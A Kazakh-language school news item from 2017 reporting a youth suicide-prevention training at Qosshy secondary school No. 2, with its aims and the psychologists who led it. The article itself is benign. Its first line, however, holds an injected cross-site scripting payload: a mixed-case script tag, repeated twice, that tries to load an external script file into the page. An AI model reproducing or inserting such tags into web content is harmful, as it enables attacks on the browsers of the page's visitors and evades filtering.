<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.10.2017

          29 қыркүйек күні №2 Қосшы орта мектебінде «Бұл өмірде – армандар шынайы» тақырыбында жастар арасында суицидтің алдын-алуға бағытталған, тренинг түріндегі топтық профилактикалық жұмыс өткізілді.

Жұмыстың мақсаты:

-        өмірге бейімделген қатынасты, стресске тұрақтылықты, өмірдің құндылығын сезінуге қалыптастыру;

-        өз-өзіне қол жұмсау мен оны болдырмау туралы психологиялық білім;

-        өзара әрекет машықтарын, қарым-қатынастарын, ұжым ынтымақтастығын дамыту;

-        жастар арасында өз-өзіне қол жұмсаудың алдын-алу;

-        бір-біріне деген толеранттық қарым-қатынасты дамыту;

     Жұмысты «Тұмар» практикалық психология орталығының директоры, психолог, Қазақстан Республикасының Психологтар Ассоциациясының Вице-президенті, психологиялық ғылымдар халықаралық академиясының мүшесі, супервизор-жаттықтырушы, интегративті психолог, практикалық психолог Любовь Александровна Федорова және «Тумар» практикалық психология орталығының практиканты, жаттықтырушы Айлина Ерланқызы Аманжолова жүргізді.

        Әр мектептен психологтар мен екі оқушыдан қатысты. Қатысушыларға «Өз-өзіне қол  жұмсаудың алдын-алу» тақырыбына әлеуметтік бейнеролик көрсетіліп, өз-өзіне қол жұмсау белгілері, себептері мен алдын-алу туралы кіші дәріс оқылды. Жастар арасында өзіне-өзі қол жұмсаудың алдын-алуға бағытталған тренинг түрінде топтық профилактикалық оқу ұйымдастырылып, қатысушылармен кері байланыс орнатылды.

Просмотров: 963

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу